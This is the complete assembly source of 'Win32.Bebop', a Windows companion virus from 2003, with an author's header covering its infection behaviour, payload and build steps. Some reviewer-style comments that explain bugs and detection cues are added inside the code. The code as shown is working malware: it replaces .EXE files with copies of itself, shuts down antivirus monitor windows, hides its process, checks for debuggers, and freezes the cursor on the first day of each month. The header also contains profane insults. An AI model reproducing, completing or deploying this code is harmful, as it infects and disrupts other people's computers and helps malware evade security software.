COMMENT#
|
|
____________________________________________________________________________________________
|
|
Win32.Bebop - Virus [Companion]
|
|
coded by -DiA- (c)03
|
|
GermanY
|
|
____________________________________________________________________________________________
|
|
|
|
|
|
Intro:
|
|
Yeah! My new creature. This is a Companion Virus (what else?). Ok, I hope you enjoy
|
|
this, and let the CODE speak...
|
|
|
|
|
|
Disclaimer:
|
|
I am NOT responsible for any damage that you do! You can use the code however you want..
|
|
My native language is not English, I hope you understand what I mean.
|
|
Feel FREE to write any Comments to
|
|
DiA_hates_machine@gmx.de
|
|
|
|
|
|
Infection:
|
|
-infect current directory
|
|
-travel directories downwards and infect them all
|
|
-go to the Windows folder and infect them
|
|
-go to the Personal folder and infect them
|
|
-infect twenty files per run
|
|
-don't infect again
|
|
|
|
|
|
Features:
|
|
-Anti-Debug
|
|
-Anti-AV-Monitors
|
|
-Anti-Bait
|
|
|
|
|
|
Payload:
|
|
-on the first day every month
|
|
-first show a little message
|
|
-after that the cursor is very slow
|
|
-workz with a thread
|
|
|
|
|
|
Greetz:
|
|
Industry - m8! See on rRLF 3
|
|
Monochrom - thanx for TASM32, you see... ;)
|
|
Weed - thanx for all, my little ganja
|
|
MyCrew - Next month, HARDCORE at Skatehall! Rock on.
|
|
?????? - and to the fucker that send me two or three mails: "Be a Internet Million..
|
|
" FUCK YOU, YOU STUPID MOTHERFUCKER! Don't send me mail's, Son of a Bitch!
|
|
|
|
|
|
First Generation:
|
|
;-----cut-----Bebop666.asm---------------------------------------------------------------
|
|
.386                                    ; 80386 instruction set
.model flat                             ; single flat 32-bit segment (Win32 PE)
jumps                                   ; TASM: silently widen out-of-range short jumps

; First-generation carrier: the only imports are a message box and process exit.
extrn MessageBoxA :PROC
extrn ExitProcess :PROC

.data
oTitle db 'Win32.Bebop - Virus - First Generation',0
oMsg db 'Yo dood, this is only the first generation',10,13   ; line breaks are emitted as LF,CR (10,13)
db 'from the Bebop - Virus. Have fun, now you',10,13
db 'are infected...',10,13,10,13
db ' coded by DiA 03 GermanY',0
|
|
|
|
.code
;-------------------------------------------------------------------------------------------
; FirstGen - entry point of the first-generation carrier (built as Bebop666, then renamed
;            to Bebop.SYS, see "Compile" below). It shows one message box and exits; it
;            carries no infection logic. The virus (Bebop.EXE) launches this .SYS file as
;            its companion "host" via CreateProcessA.
; stdcall: arguments are pushed right-to-left.
;-------------------------------------------------------------------------------------------
FirstGen:
push 16                                 ; uType = 10h (MB_ICONHAND)
push offset oTitle                      ; lpCaption
push offset oMsg                        ; lpText
push 0                                  ; hWnd = NULL
call MessageBoxA                        ; MessageBoxA(NULL, oMsg, oTitle, MB_ICONHAND)

push 0                                  ; uExitCode = 0
call ExitProcess                        ; does not return

end FirstGen                            ; FirstGen is the PE entry point
|
|
;-----cut--------------------------------------------------------------------------------
|
|
|
|
|
|
Compile:
|
|
First Gen->
|
|
TASM32 /z /ml /m3 Bebop666,,;
|
|
TLINK32 -Tpe -c -aa Bebop666,Bebop666,, import32.lib
|
|
rename Bebop666.EXE Bebop.SYS
|
|
|
|
Virus ->
|
|
TASM32 /z /ml /m3 Bebop,,;
|
|
TLINK32 -Tpe -c -aa Bebop,Bebop,, import32.lib
|
|
|
|
[Bebop.EXE and Bebop.SYS must be in one directory]
|
|
|
|
|
|
Ok, that's it! I wrote many comments in the code...
|
|
...HAVE FUN and read my tut's! :)
|
|
|
|
____________________________________________________________________________________________
|
|
____________________________________________________________________________________________
|
|
#
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----HEAD----------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
.386                                    ; 80386 instruction set
.model flat                             ; single flat 32-bit segment (Win32 PE, stdcall imports)
jumps                                   ; TASM: silently widen out-of-range short jumps
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Needed API's--------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
; Imports, resolved through import32.lib (see the Compile notes in the header comment).
extrn IsDebuggerPresent :PROC           ; AntiDebugger: exit as soon as a debugger is attached
extrn GetCurrentProcessId :PROC         ; own PID for RegisterServiceProcess
extrn RegisterServiceProcess :PROC      ; Windows 9x-only kernel32 export (hides the process from the
                                        ; task list); NT-family kernel32 does not export it, so the
                                        ; image should fail to load there with an unresolved import
extrn GetCommandLineA :PROC             ; recover own path (VirusFile) from the command line
extrn lstrcpyA :PROC
extrn CreateProcessA :PROC              ; run the companion host (xxx.SYS)
extrn CopyFileA :PROC                   ; xxx.EXE -> xxx.SYS, then VirusFile -> xxx.EXE
extrn FindFirstFileA :PROC              ; *.EXE enumeration; no FindClose is imported, so search
extrn FindNextFileA :PROC               ; handles are never released
extrn SetCurrentDirectoryA :PROC        ; directory walking (CDdotdot / SetDirectory)
extrn RegOpenKeyExA :PROC               ; GetPersonalDir: read "Personal" from Shell Folders
extrn RegQueryValueExA :PROC
extrn RegCloseKey :PROC
extrn FindWindowA :PROC                 ; KillMonitor: locate AV monitor windows by title ...
extrn PostMessageA :PROC                ; ... and post WM_QUIT to them
extrn GetWindowsDirectoryA :PROC
extrn GetSystemTime :PROC               ; payload trigger: wDay == 1
extrn CreateThread :PROC                ; payload runs in the StopCursor thread
extrn CloseHandle :PROC
extrn GetCursorPos :PROC                ; main thread keeps POINT updated ...
extrn SetCursorPos :PROC                ; ... payload thread keeps writing it back
extrn Sleep :PROC
extrn MessageBoxA :PROC
extrn ExitProcess :PROC
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Nedded DATA's-------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
.data?                                  ; uninitialised data: zero-filled by the loader

FILETIME STRUC                          ; Win32 FILETIME (8 bytes)
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS

; Hand-laid-out WIN32_FIND_DATAA (4+24+16+260+16 = 320 bytes). The fields are plain labels,
; not a STRUC, so they are addressed directly (e.g. WFD_szFileName).
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)          ; cFileName[MAX_PATH]; the name copied into TargetFile
WFD_szAlternateFileName db 13 dup (?)   ; cAlternateFileName[14] is split 13 + 3 here ...
WFD_szAlternateEnding db 03 dup (?)     ; ... the extra 2 bytes cover the structure's tail padding

SYSTEMTIME:                             ; Win32 SYSTEMTIME (8 WORDs); only wDay is read
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMilliseconds WORD ?

POINT:                                  ; Win32 POINT; written by GetCursorPos, read by SetCursorPos
x DWORD ?
y DWORD ?

VirusFile db 260d dup (?)               ; full path of this executable (from GetCommandLineA)
HostFile db 260d dup (?)                ; VirusFile with .EXE -> .SYS; afterwards reused as the
                                        ; scratch path that CDdotdot truncates while walking up
TargetFile db 260d dup (?)              ; current find result, extension rewritten to .SYS

ProcessInfo dd 4 dup (?)                ; PROCESS_INFORMATION (16 bytes); its handles are never closed
StartupInfo dd 4 dup (?)                ; NOTE: 16 bytes reserved, but STARTUPINFOA is 68 bytes;
                                        ; CreateProcessA presumably reads the remaining 52 bytes from
                                        ; the bytes that follow (PersonalFolder), still zero at that time

PersonalFolder db 260d dup (?)          ; "Personal" value read from Shell Folders (registry)
WindowsFolder db 260d dup (?)           ; GetWindowsDirectoryA result
|
|
|
|
.data

; Window titles of AV on-access monitors of the period; KillMonitor posts WM_QUIT to each
; window found with FindWindowA. Monitors not running, or with another title, are unaffected.
AVP db 'AVP Monitor',0
McAfee db 'McAfee VShield',0
Solomon db 'SCAN32',0
FProt db 'FP-WIN',0
Norton db 'NAVAPW32',0

FindHandle dd 0                         ; search handle from FindFirstFileA (never passed to FindClose)
RegHandle dd 0                          ; HKEY from RegOpenKeyExA (stays 0 when the open fails)
lpType dd 0                             ; receives the value type from RegQueryValueExA; not read
ThreadID dd 0                           ; receives the payload thread id; not read

FileMask db '*.EXE',0                   ; only .EXE files get a .SYS companion
FileCounter db 20                       ; per-run infection budget; reaching 0 ends the process

Size dd 260d                            ; in/out buffer size for RegQueryValueExA (lpcbData)

; Relative to HKEY_USERS: the .DEFAULT profile. NOTE(review): on NT-family systems .DEFAULT is
; the default profile rather than the logged-on user's - confirm which folder this resolves to.
ShellFolders db '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Personal db 'Personal',0                ; value name of the "Personal" folder

; Payload message box, shown once by the StopCursor thread (only on day 1 of a month)
oTitle db 'Win32.Bebop - Virus',0
oMsg db 'Yeah! Bebop get''s you. Don''t be angry, this nice',10,13
db 'Virus don''t have any DESTRUCTIVE CODE!',10,13
db 'Or for stupid people: Wait a while, next day the',10,13
db 'Bebop-Virus go away...',10,13,10,13
db ' Win32.Bebop coded by DiA (c)2003 [GermanY]',0
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Win32.Bebop starts--------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
.code
;-------------------------------------------------------------------------------------------
; Bebop - PE entry point of the companion virus.
; Flow: post WM_QUIT to known AV monitor windows -> register as a Win9x service process
;       -> launch the companion host (own path with .EXE replaced by .SYS) -> infect the
;       start directory and each of its parents up to the drive root -> infect the Windows
;       directory and the "Personal" directory -> on day 1 of a month start the cursor
;       payload thread and spin forever, otherwise ExitProcess.
; Registers kept live across calls: esi = string cursor handed to GetPoint / KillMonitor /
;       SetDirectory; ebx = cursor inside HostFile for CDdotdot (0 = drive root reached).
; No stack frame: every buffer is a global in .data?.
;-------------------------------------------------------------------------------------------
Bebop:
;-------------------------------------------------------------------------------------------
;-----Fuck some AV-Monitors-----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call AntiDebugger ;ExitProcess if IsDebuggerPresent() is non-zero

mov esi,offset AVP ;esi = window title to look for
call KillMonitor ;FindWindowA by title + PostMessageA WM_QUIT

mov esi,offset McAfee
call KillMonitor

mov esi,offset Solomon
call KillMonitor

mov esi,offset FProt
call KillMonitor

mov esi,offset Norton
call KillMonitor
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------

;-------------------------------------------------------------------------------------------
;-----Hide the Bebop Process----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCurrentProcessId ;eax = own PID

push 1 ;dwType = 1 (RSP_SIMPLE_SERVICE): hides the process from the Win9x task list
push eax ;dwProcessId
call RegisterServiceProcess ;Win9x-only API, see the extrn list
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------

;-------------------------------------------------------------------------------------------
;-----Restore Hostname & Run Host-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCommandLineA ;looks like "C:\MyC00lPr0gZ\veryCool\Fucking.EXE"

inc eax ;skip the leading quote - assumes the command line is quoted; nothing checks that
push eax ;lpString2 (src)
push offset VirusFile ;lpString1 (dst)
call lstrcpyA ;VirusFile = command line minus its first character

mov esi,offset VirusFile
call GetPoint ;esi -> '.' of ".EXE" (unbounded scan, see GetPoint)
mov dword ptr [esi+4],00000000h ;terminate right after "EXE": drops the closing quote and any arguments

push offset VirusFile ;src
push offset HostFile ;dst
call lstrcpyA ;HostFile = VirusFile

mov esi,offset HostFile
call GetPoint ;esi -> '.'
mov dword ptr [esi],5359532Eh ;bytes 2E 53 59 53 = ".SYS": HostFile is now the companion's path

call AntiDebugger

; CreateProcessA(HostFile, HostFile, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL,
;                &StartupInfo, &ProcessInfo). Return value ignored; ProcessInfo handles never closed.
xor eax,eax ;eax = 0 for all NULL / FALSE arguments
push offset ProcessInfo ;lpProcessInformation
push offset StartupInfo ;lpStartupInfo (only 16 bytes reserved, see .data?)
push eax ;lpCurrentDirectory
push eax ;lpEnvironment
push 10h ;dwCreationFlags = CREATE_NEW_CONSOLE
push eax ;bInheritHandles
push eax ;lpThreadAttributes
push eax ;lpProcessAttributes
push offset HostFile ;lpCommandLine
push offset HostFile ;lpApplicationName
call CreateProcessA
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------

;-------------------------------------------------------------------------------------------
;-----Travel Directorys & Infect them-------------------------------------------------------
;-------------------------------------------------------------------------------------------
; HostFile is no longer needed; CDdotdot truncates it in place to walk up the directory tree.
mov esi,offset HostFile
call GetPoint ;esi -> '.'
mov ebx,esi ;ebx = backwards scan cursor for CDdotdot
call CDdotdot ;cut after the last '\' and SetCurrentDirectoryA there (the start directory)
call InfectFiles ;*.EXE in that directory

InfectCDdotdot:
call CDdotdot ;one level up; ebx = 0 once the drive root ("X:\") has been passed
test ebx,ebx
jz InfectNext
call InfectFiles
jmp InfectCDdotdot ;walks towards the root: only ancestors of the start directory are visited,
                   ;subdirectories are not

InfectNext: ;fixed locations
call AntiDebugger

push 260d ;uSize (MAX_PATH)
push offset WindowsFolder ;lpBuffer
call GetWindowsDirectoryA ;easier through the API than via the registry

mov esi,offset WindowsFolder
call SetDirectory ;SetCurrentDirectoryA(WindowsFolder), result not checked
call InfectFiles

call GetPersonalDir ;PersonalFolder = HKU\.DEFAULT\...\Shell Folders\Personal (left empty if the read fails)
mov esi,offset PersonalFolder
call SetDirectory ;SetCurrentDirectoryA(PersonalFolder), result not checked
call InfectFiles
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------

;-------------------------------------------------------------------------------------------
;-----Payload, if Day 1. of Month-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
push offset SYSTEMTIME ;lpSystemTime
call GetSystemTime

cmp word ptr [wDay],1 ;day of month == 1 ?
jne FuckingDebugger ;otherwise exit now

; CreateThread(NULL, 0, StopCursor, NULL, 0, &ThreadID); the thread handle is closed at once.
push offset ThreadID ;lpThreadId
push 0 ;dwCreationFlags
push 0 ;lpParameter
push offset StopCursor ;lpStartAddress
push 0 ;dwStackSize
push 0 ;lpThreadAttributes
call CreateThread

push eax ;hObject = thread handle
call CloseHandle

GetCurrentPos: ;main thread: busy loop refreshing POINT with the current cursor position
push offset POINT ;lpPoint
call GetCursorPos
jmp GetCurrentPos ;never leaves; StopCursor keeps calling SetCursorPos with these coordinates
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------

;-------------------------------------------------------------------------------------------
;-----Exit & stay (sic)---------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
FuckingDebugger: ;shared exit: debugger detected, day != 1, or FileCounter reached 0
push 0 ;uExitCode
call ExitProcess
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Infect Files Procedure----------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
; InfectFiles - give every *.EXE in the current directory a companion.
; In:   current directory set by the caller; FileCounter = remaining budget.
; Out:  nothing. Decrements FileCounter per infected file and jumps to FuckingDebugger
;       (ExitProcess, no return to the caller) when it reaches 0.
; Uses: eax, ecx, esi, edi, flags; FindHandle, WIN32_FIND_DATA, TargetFile.
; Per file: skip names that are digits-only up to the '.'; CopyFileA xxx.EXE -> xxx.SYS
;       with bFailIfExists (an existing .SYS means "already infected"); then CopyFileA
;       VirusFile over xxx.EXE.
;-------------------------------------------------------------------------------------------
InfectFiles: ;procedure
call AntiDebugger

push offset WIN32_FIND_DATA ;lpFindFileData
push offset FileMask ;lpFileName = '*.EXE',0
call FindFirstFileA
mov dword ptr [FindHandle],eax ;search handle; never released with FindClose

FindNext:
test eax,eax ;0 = FindNextFileA returned FALSE -> done
jz FindMore ;NOTE: FindFirstFileA signals failure with INVALID_HANDLE_VALUE (-1), not 0, so this
            ;test lets one pass run on whatever WFD_szFileName holds; the FindNextFileA call
            ;below with the bad handle then returns FALSE and ends the loop

push offset WFD_szFileName ;src: file name found
push offset TargetFile ;dst
call lstrcpyA

; Anti-bait: a name made only of digits up to the '.' is skipped.
xor eax,eax ;eax stays zero-extended: lodsb writes al only
mov esi,offset TargetFile ;read cursor
mov edi,esi ;write cursor (same buffer; stosb puts each digit back where it was)
mov ecx,48d ;'0'

CheckBait: ;next character
lodsb ;al = next character

CheckNum: ;match al against '0'..'9' by counting ecx upwards
cmp eax,46d ;'.': only digits so far -> treat as bait
je Bait

cmp eax,ecx ;equals the current digit candidate?
je ScanNext

cmp eax,57d ;above '9' (letters etc.) -> not a bait name
ja NoBait

inc ecx ;try the next digit
jmp CheckNum ;NOTE: a character below '0' that is not '.' (space, '!', '-', ...) never matches
             ;and is never above '9', so ecx counts through a full 32-bit wrap (about 2^32
             ;iterations) before it equals the character and ScanNext is taken

ScanNext: ;digit confirmed
stosb ;store the digit back in place
mov ecx,48d ;restart at '0'
jmp CheckBait

NoBait: ;go on with infection

mov esi,offset TargetFile
call GetPoint ;esi -> '.'
mov dword ptr [esi],5359532Eh ;".SYS": TargetFile = xxx.SYS

; CopyFileA(WFD_szFileName, TargetFile, bFailIfExists = TRUE)
push 1 ;bFailIfExists
push offset TargetFile ;lpNewFileName (xxx.SYS)
push offset WFD_szFileName ;lpExistingFileName (xxx.EXE)
call CopyFileA

test eax,eax ;FALSE: xxx.SYS already exists (already infected) or the copy failed
jz FindNextPhile

; CopyFileA(VirusFile, WFD_szFileName, bFailIfExists = FALSE): overwrite the original .EXE
push 0 ;bFailIfExists
push offset WFD_szFileName ;lpNewFileName
push offset VirusFile ;lpExistingFileName
call CopyFileA ;return value not checked

dec byte ptr [FileCounter] ;one of the 20 per-run slots used
cmp byte ptr [FileCounter],0
jz FuckingDebugger ;budget exhausted: ExitProcess

FindNextPhile:
call AntiDebugger

Bait: ;skipped (bait) or done: fetch the next match
push offset WIN32_FIND_DATA ;lpFindFileData
push dword ptr [FindHandle] ;hFindFile
call FindNextFileA ;eax = BOOL
jmp FindNext

FindMore:
ret ;back to the caller, which moves to the next directory
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Anti Debug Procedure------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
; AntiDebugger - end the process if IsDebuggerPresent() is non-zero, otherwise return.
; Called from many places (entry, every GetPoint hit, KillMonitor, InfectFiles, ...). On
; detection it jumps to FuckingDebugger (ExitProcess) without unwinding the stack, which is
; irrelevant since the process ends. Clobbers eax and flags.
;-------------------------------------------------------------------------------------------
AntiDebugger:
call IsDebuggerPresent ;eax = BOOL
test eax,eax
jnz FuckingDebugger ;debugger attached -> ExitProcess
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Get Point Procedure-------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
; GetPoint - advance esi to the first '.' at or after esi.
; In:   esi -> NUL-terminated string.
; Out:  esi -> the '.' found. Clobbers flags and eax (through AntiDebugger).
; There is no length and no NUL check: a string without a '.' makes the scan run past the
; end of its buffer. Callers rely on every path carrying a ".EXE"/".SYS" extension.
;-------------------------------------------------------------------------------------------
GetPoint: ;procedure
cmp byte ptr [esi],'.' ;is this the '.'?
jz FoundPoint
inc esi ;next character
jmp GetPoint

FoundPoint:
call AntiDebugger
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----CD.. Procedure------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
; CDdotdot - "cd .." on the path held in HostFile and make it the current directory.
; In:   ebx -> a position inside HostFile from which to scan backwards.
; Out:  ebx -> the character before the '\' just found (ready for the next call), current
;       directory switched to the truncated HostFile; or ebx = 0 when ':' is reached first,
;       i.e. the drive root has already been passed (no SetCurrentDirectoryA in that case).
; Side effect: writes 4 zero bytes into HostFile right after the '\' found.
; Clobbers: esi, eax, flags. The scan stops only on '\' or ':', so it assumes a drive-letter
;       path. ClearAfter falls through into SetDirectory, which other callers also enter
;       directly with esi -> any path.
;-------------------------------------------------------------------------------------------
CDdotdot: ;procedure
GetSlash: ;scan backwards for '\'
cmp byte ptr [ebx],'\'
jz ClearAfter

cmp byte ptr [ebx],':' ;"X:" reached: nothing above the root
jz SetError

dec ebx ;one character back
jmp GetSlash

ClearAfter: ;truncate right after the slash
inc ebx ;keep the '\' itself (a trailing '\' is needed for the root)
mov dword ptr [ebx],00000000h ;everything after the '\' is cut off
sub ebx,2 ;ebx -> character before the '\', so the next call finds the previous one

mov esi,offset HostFile ;path to switch to

SetDirectory: ;SetCurrentDirectoryA(esi); return value not checked
push esi ;lpPathName
call SetCurrentDirectoryA
ret

SetError: ;drive root passed: signal "no more parents"
xor ebx,ebx ;ebx = 0
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Read Personal Directory from Registry Procedure---------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
; GetPersonalDir - PersonalFolder = value "Personal" under HKEY_USERS\.DEFAULT\...\Shell Folders.
; Out:  PersonalFolder (untouched, i.e. still zero-filled, if the key cannot be opened or
;       the value cannot be read); Size updated by RegQueryValueExA; RegHandle, lpType set.
; Clobbers eax and flags. Neither API result is checked beyond the open; RegCloseKey is
; called on both paths, i.e. with RegHandle = 0 when the open failed.
;-------------------------------------------------------------------------------------------
GetPersonalDir: ;procedure
; RegOpenKeyExA(HKEY_USERS, ShellFolders, 0, 001F0000h, &RegHandle)
push offset RegHandle ;phkResult
push 001F0000h ;samDesired = STANDARD_RIGHTS_ALL; no KEY_QUERY_VALUE bit, so "read and write"
               ;is not what this mask grants - NOTE(review): confirm how the open behaves on
               ;NT-family systems; on failure PersonalFolder stays empty
push 0 ;ulOptions
push offset ShellFolders ;lpSubKey
push 80000003h ;hKey = HKEY_USERS
call RegOpenKeyExA

test eax,eax ;ERROR_SUCCESS = 0
jnz RegError

; RegQueryValueExA(RegHandle, "Personal", NULL, &lpType, PersonalFolder, &Size); result not checked
push offset Size ;lpcbData (in: 260)
push offset PersonalFolder ;lpData
push offset lpType ;lpType (not used afterwards)
push 0 ;lpReserved
push offset Personal ;lpValueName
push dword ptr [RegHandle] ;hKey
call RegQueryValueExA

RegError: ;also the normal exit
call AntiDebugger

push dword ptr [RegHandle] ;hKey (0 if the open failed)
call RegCloseKey
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Anti AV-Monitor Procedure-------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
; KillMonitor - post WM_QUIT to the top-level window whose title is the string at esi.
; In:   esi -> window title (one of AVP / McAfee / Solomon / FProt / Norton).
; Out:  nothing. Clobbers eax and flags.
; Observable behaviour for detection: an unrelated process posting WM_QUIT to a security
; product's window. A monitor that is not running or uses another title is unaffected.
;-------------------------------------------------------------------------------------------
KillMonitor:
call AntiDebugger

push esi ;lpWindowName
push 0 ;lpClassName = NULL
call FindWindowA ;eax = HWND or NULL

test eax,eax ;no such window?
jz FuckNextMonitor

push 0 ;lParam
push 0 ;wParam
push 12h ;Msg = WM_QUIT (0012h)
push eax ;hWnd
call PostMessageA ;return value not checked

FuckNextMonitor:
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Stop the Cursor Procedure-------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
; StopCursor - payload thread entry (CreateThread lpStartAddress; lpParameter is unused).
; Shows the message box once, then loops forever: Sleep(2000) followed by 4000 calls of
; SetCursorPos(x, y) with the coordinates the main thread keeps writing into POINT through
; GetCursorPos. Never returns, so the missing stdcall epilogue does not matter.
; Clobbers eax, edx, flags. NOTE: edx is caller-saved under the Win32 calling convention,
; so the loop counter survives SetCursorPos only if user32 happens to preserve it.
;-------------------------------------------------------------------------------------------
StopCursor:
push 16 ;uType = MB_ICONHAND
push offset oTitle ;lpCaption
push offset oMsg ;lpText
push 0 ;hWnd = NULL
call MessageBoxA

call AntiDebugger

SleepStop: ;pause, then another burst
push 2000d ;dwMilliseconds = 2 s
call Sleep

xor edx,edx ;edx = calls made in this burst
StopIt:
cmp edx,4000d ;4000 SetCursorPos calls per burst
je SleepStop

push dword ptr [y] ;Y
push dword ptr [x] ;X
call SetCursorPos ;put the cursor back where the main thread last saw it

inc edx
jmp StopIt
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Win32.Bebop ends----------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
end Bebop
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;------------------------------------------------------------------------Germany2003--------